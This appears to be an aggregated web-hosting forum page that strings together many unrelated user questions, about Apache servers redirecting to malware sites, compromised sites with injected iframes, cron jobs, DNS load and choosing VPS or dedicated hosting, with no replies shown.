All HTTP Requests To My Server Gets Redirected To Malware Websites
Jul 24, 2009
When i try to open any website hosted on my server (around 50 of them) i am being taken to following malware website;
[url]
[url]
This is a problem with my Limnux server running Apache and not a virus on my local computer as customers from all over are reporting the same issue.
As soon as i restart Apache eveything returns to normal with no such redirects.
I think my server is being attacked causing http requests to get redirected to some malicious website.
This issue would resurface almost every hour and would not go away till i restart apache.
So far my Datacenter techs. have not been able to identify the cause of this.
There seems to be some problem with my server, none of the websites hosted on my server are accessible, the http requests either return a blank page or a page with a red quare on the upper left hand corner.
I am not sure if this is some kind of infection or DNS problem or a problem with memory apache is taking up as i have thousands of virtualhost entries in my access log accumulated over the years out of which only a few 100 websites i am serving presently, but never deleted the non-exitent virtualhost blocks.
At times the websites are opening but most of the times they are not. And when they do not open my http requets are not logged in apacha access log.
Even the customers have reported the same problem.
Also, just four days back i had a strange issue where all http requests to my server would take me to [url].
I can SSH to server, and everything else is working fine.
My Linux Server's Http Daemon (Apache) would stop serving websites ever so often, as soon as apache is restarted the error fixes iteself only to resurface within few hours.
The apache process would still be running i.e. apache does not die but no websites hosted on my server would be accessible from browser. And when this happens the apache logs do not log any http requests.
Instead when this happens all http requests to my server would be redirected to some weird Trojan website and my Norton Antivirus would show an Alert/Warning, for example; "Browser exploit at www.xxx.xxx was blocked" Risk Name: MSIE WebViewFolderIcon ActiveX Control BO
or another error like; "Auto-Protect has detected Trojan.Fakeavalert".
At first i thought the problem could be with my Laptop/ISP so i logged on to the server via SSH and opened try to open a website using command line "lynx mywebsite.com" and it shows following error; "Alert!: HTTP/1.0 503 Service Unavailable".
Now if i assume my laptop were to be infected, then as soon as i restart my apache and visit mywebsite.com eveything returns to normal with no such warnings. Why do i see those norton error messages only when apache is down with 503, and when apache is down with 503 how come the http requests always get redirected to some suspicious websites and nothing gets logged in apache error log?
I think my server is being attacked causing http to get unresponsive and thereafter http requests to my server are redirected to some malicious website, is this correct?
Also, i suspect this is a php script exploit as some customers have reported that google have blocked their website due to security reasons, i found <iframe> tage inserted in some php pages which i fixed.
Also, another thinh i noticed; when apache responds with the 503 it is referencing PHP 5.1.4 in the header response:
[root@]# curl -I xxx.xxx.xxx.xxx (my server ip) HTTP/1.0 503 Service Unavailable Server: Apache X-Powered-By: PHP/5.1.4 Retry-After: 20
I am running PHP 4.3.9m why does apache responds with PHP 5.1.4 when this 503 error surfaces?
Also, since my apache was dowan with 503 error a customer mailed in today saying; "It seems that my site www.xxxx.com is regularly down, and the winlogon virus is involved."
I suspect this is again due to the fact that http requests start getting redirected?
I set up a cron to run every minute & I'm running a PHP script by way of cron like
wget http://example.com/some_script.php
Now does each request of Cron is a seperate HTTP Request or what? Say my script takes more than 1 minute to execute completely but before its completed, its called again. So, will that effect the PHP script running because of previous HTTP Request or will it create a new HTTP Request & let the previous request finish its operation? Technically, it shouldn't block/affect the previous request, but I'm not sure!!
I have a guy who can't get to any of the 100 or so virtual hosts on my RHEL3 server.
It's running the latest Apache RPM from RedHat. I also have mod_evasive and mod_security running.
Here's what I know. The guy *CAN* connect via SSH and FTP. The guy *CAN* see the default web page when he hits the IP in his web browser (e.g. he types [url]into the address bar on IE). But when he uses any of the host names on the server he *CAN NOT* see anything. He gets timeout errors.
His IP in NOT in ANY error logs, it's not in mod_evasive or mod_security, it's not in IPTABLES, it's not anywhere I can see.
I must be missing something. Anyone have any ideas?
What would be in front of Apache blocking his requests?
I have a situation where if domain2 or domain3 is offline, people visiting them will get redirected to domain1 (since domain1 is the top of the hierarchy in the virtualhost). If I type in the IP address 11.22.333.44, I get redirected to domain1. I don't want this to happen. I rather have it show an error page or something instead. Am I missing anything? Here's the sample from my httpd.conf file:
my server is still effed up from the MPack attack that I received.
I just received the following email, does anyone know what this means or how it could be done? The client IP is mine, so some how my server is sending that request?
I was able to successfully delete all the files, but how do I now get rid of the directories themselves? When I do: rm -fr "/arcade/images/. /" and then locate ". " I still get:
I've spent the last several months working on a huge upgrade of a couple dozen websites. The upgrades include modifying Apache so that visitors who arrive at links pointing to mysite/World/New_York are redirected to mysite/world/new-york. In other words, all my links now default to lower case, and underscores are replaced with dashes.
Unfortunately, publishing it has been an endless series of disasters. My websites are now all crashed, and the server is unbelievably slow. It takes pages forever to load (if they load at all), and I can scarcely publish files online.So the following notice sent to me by my webhost got my attention.
IT appears your own server IP is making GET requests to Apache, causing excessive loading and causing service failures. On today's date, your IP made almost 6,000 connections to Apache:<br><br>
I am using mod_auth_form.For security reasons, I would like to ensure that users are ALWAYS redirected to the page specified in AuthFormLoginSuccess Location after a successful login. Therefore, I would like to disable processing of the httpd_location form parameter.
The best I can do seems to be to use AuthFormLocation to set the field name to a hard-to-guess value, e.g. AuthFormLocation "32 b63 a#ve"
I host my DNS with DNSmadeeasy.com , I noticed that I have daily more than 350.000 DNS requests for main domain, This domains got about 80.000 uniqes/day, so this is strange how can there be 350.000 DNS requests/day. Seems that I'll go over the quota because of this.
The TTL for all domains is set to 86400.
Is there a way to discover how its possible ? And also is there a way to do something to make this number lower (DNS requests)
Where is a server's IP address for outgoing requests set? e.g. if a script on the server fetches ip-address.com, the IP that is identified there. A server may have multiple IPs pointing to it, but there's only one that outgoing requests are funneled through. I've tried changing "Main Shared IP" in WHM, but that doesn't seem to affect this.
Is this set server-side, in some setting file - or is this a datacenter thing?
Can this be interpreted as a malware (procede the following steps with caution).
After visiting miniclip.com/games/super-gerball/en/ without me clickiing on anything and confirming that I want to Install a game, a new folder is created in my Windows Start Menu and in a Documents and Settings folder.
Although I believe no harm is actually done with this installation, can attacker use this method to install a malware? How can I prevent this, what options should I change in my Firefox browser?
I currently have a web VPS hosted with FDCServers.net and after 5 days of switching to it i am getting massive HTTP requests. When i login to WHM and hit apache status i have many requests per second by multiple IP's that are going to pages that simple don't exist. Currently my hostname for the server is set at web-01.optical-hosting.com which is what the requests are being sent to. I am also having a DNS issue because when i put http://web-01.optical-hosting.com in the web browser it displays the first account's site under "list accounts" in cpanel. Can someone please help me fix both of these issue's? i will post an apache log in a second post as it is long. Also, these are from overseas. please someone help me with this i have Aim and Msn.
Recently, i hosted my domain with two different servers. but both of them were attacked by malwares and viruses. Google also started showing warning like "This site may harm your computer".
Now i can't open my site on firefox (it gives security warning)... when i open in explorer , my index page is totally changed.
Is there a solution for that? Which linux server will be best to protect my site from malware attacks.
A website I've recently been entrusted with was cracked into via brute force ftp earlier this week. Apparently the bad guys ran a script that added iframe links to every page named index.html. The iframe linked to 3 sites that prompted malware downloads.
I think I've found and removed all the affected code, however I'm looking for an online website scanner that will drill down through all the links on a given site and search the code for similar problems.
I've only found a couple of these so far and they don't seem to fit the bill; was wondering if anyone here had recommendations or experience with similar tools...
I'm running Apache 2.4.4 on Windows Server 2008 R2. It's already happened many times that Apache stopped responding to requests. The last entry in the error.log:
[Wed Mar 27 06:22:07.043600 2013] [mpm_winnt:notice] [pid 1736:tid 256] AH00354: Child: Starting 64 worker threads. [Wed Mar 27 06:52:34.521200 2013] [mpm_winnt:error] [pid 1736:tid 1656] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
Yesterday I installed tomcat on a RHEL 4 + cPanel and httpd 2.0.63 server using easyapache3, process was ok, jsp pages are loading fine using http://site.com/example.jsp , but servlets, are not working using http://site.com/example, how ever, if I load http://site.com:8080/example it loads the servlet perfect.
I read something about redirecting all traffict from port 80 to 8080, but you know.. this is a shared server, and that would affect all customers on the server.
So, mod_jk seems to be the only solution, now I read many documents over the web, but no one seems to be working to configure apache2 and mod_jk that is installed using easyapache3 script.
In my httpd.conf file, i have this:
LoadModule jk_module modules/mod_jk.so Include "/usr/local/apache/conf/jk.conf" At jk.conf i have this content: ...
A Wordpress install on one of my domains was compromised a few months ago, and there was a 4-hour window in which the site contained an iframe injection that lead to a malware site.
The problem was corrected, and Google stopped flagging the site as malicious within a few hours after the fix. However, every once in a while I still hear of people having problems accessing the site, all of them I think from within large corporate networks.
Are there a few common list providers that these corporate networks are likely to be subscribing to? Is there a way I can submit the domain for reevaluation? If not, how long would you think a domain would have to be clean in order to repair its reputation on these lists?
i currently have a reseller server in the states but ive seen for the money im paying (and im not using the space actually) i can get a VPS server here in the UK which i can combine for webhosting and other development projects. I am after a UK based VPS for the following requirements:
Host 15 websites
Access the box remotely and dial-in to the box which needs to be configured as a VPN server (the box will act as a router, i presume masquerading on eth0 for the connected vpn clients to go out through the server and onto the net).
Traffic will not be too high, maybe around 75GB per month.
Around 3-4 websites run forums on (small size phpbb) and the other sites are again small and mostly used for email.
I will need full root access and maximum configurability.
Preferably Suse 10 as i have worked with that before but i am open to suggestions on other OS. I need to configure the pppd service and easier this is via the OS the less time i have to dig in scripts and terminal! I wouldnt mind windows but on a VPS this will be a resource drain so i am happy to get more performance from the box by sticking with smaller footprint of linux.
Plesk for website management, or cpanel, i dont mind either way.
I dont however know how much CPU/RAM i will need, what is a sensible amount? I dont think my requirements are too strenuous, what would be a good sensible amount of RAM to select to allow me to host say 50 web sites in future?
I have heard good things on the forums for the following:
a2b2.com cheapvps.co.uk 1and1.co.uk
I know you get what you pay for so i do need something reliable, but if people say the service from the above sellers is good i will go for them as the price is fantastic. It would be great to hear of other recommendations also.
I have a Windows Server 2003 package installed on a server. I own a number of websites that are being hosted some place else. How do I get my websites set-up to run on my new server?
I have a client with a site (wordpress blog) that gets 10,000 + hits a day. I need to find him a dedicated managed server so that his site runs smoothly and also has no outages. I just received a quote from another host for his Managed Dedicated Servers.
CPU1: Intel Xeon 5310 Clovertown (Quad Core) CPU2: Intel Xeon 5310 Clovertown (Quad Core) Total CPU Cores: Eight (8) System RAM: 6144MB (6GB) DDR2 ECC Registered System RAM Primary Hard Disk: 73GB Serial Attached SCSI (SAS) 15,000 RPM High-Performance Hard Disk Second Hard Disk: 250GB SATA-II 7,200 RPM Hard Disk (nightly backup disk) Data Transfer: 2000GB Premium Monthly Bandwidth (100Mbps uplinked port) Operating System: CentOS Enterprise Linux 5 64-Bit (x86_64) Control Panel License: cPanel / WHM + Fantastico Auto Installer$695 a month
He posts about 5-10 blogs a day too, so it's definitely a growing community website. He also has a forum with 6500 posts and 389 members.
Is this a reasonable price for a dedicated server? Would you recommend a different configuration of hardware that might make it cheaper? I would also like some examples of other sites on similar configurations if you have any, so that I can show my client what they use.
A lot of people start off with a dedicated server when they first start their website because they feel they will eventually need it anyway. They also don't want to go through the trouble of transferring their website in the future. Do you think it's wise for a new website to do this or do you feel they should start off with shared hosting and then transfer their website after it already has a lot of traffic?
